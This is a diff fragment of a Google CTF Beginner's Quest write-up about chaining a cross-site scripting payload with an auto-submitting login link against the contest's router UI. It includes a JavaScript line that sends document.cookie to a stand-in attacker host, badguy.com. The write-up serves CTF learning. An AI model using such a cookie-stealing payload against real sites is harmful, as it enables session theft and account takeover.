limbernie/limbernie.github.io/_posts/2018-07-31-google-ctf-beginners-quest-part-2.md

 document.location = 'http://www.badguy.com/flag.png?' + document.cookie;
 ```

-Next up, we have to figure out what link to send to Wintermuted such that clicking the link has the same effect as POSTing the username and password as seen above to `https://router-ui.web.ctfcompetition.com/login` and triggering the bad JS, without any user interaction.
+Next up, we have to figure out the link to send to Wintermuted such that clicking the link has the same effect as POSTing the username and password as seen above to `https://router-ui.web.ctfcompetition.com/login` and triggering the bad JS, without any user interaction.

-The link would be `https://www.badguy.com/index.html` and this is how it looks like.
+This is how it looks like.

 ```html
 <html>